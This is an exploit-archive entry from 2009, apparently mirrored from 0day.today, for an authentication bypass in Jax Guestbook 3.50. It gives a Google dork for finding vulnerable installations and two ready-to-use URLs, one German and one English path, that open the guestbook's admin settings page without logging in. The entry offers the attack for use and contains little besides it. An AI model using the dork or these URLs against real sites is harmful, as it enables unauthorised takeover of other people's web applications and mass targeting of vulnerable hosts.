id: 10384
date: 12/24/2009
title: Jax Guestbook 3.50 Admin Login Exploit
author: Sora
cves: 

======================================
Jax Guestbook 3.50 Admin Login Exploit
======================================

# Exploit Title: Jax Guestbook 3.50 Admin Login Exploit
# Date: December 23rd, 2009
# Author: Sora
# Software Link: http://script.wareseeker.com/ASP-NET/jax-guestbook-3.50.zip/32956d53cf
# Version: 3.50
# Tested on: Windows and Linux
 
-------------------------------------------
>> Jax Guestbook 3.50 Admin Login Exploit
>> Description: Jax Guestbook 3.50 suffers a bug that will allow you to log in as the admin.
>> Found by: Sora
>> Google Dork: "inurl:guestbook.admin.php?action=settings"
 
We can access the admin directory of Jax Guestbook 3.50 to edit the admin settings.
 
# Code: http://www.site.com/admin/gaestebuch/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <German>
http://www.site.com/admin/guestbook/admin/guestbook.admin.php?action=settings&guestbook_id=0&language=english&gmt_ofs=0 <English>
 



#  0day.today [2023-03-24]  #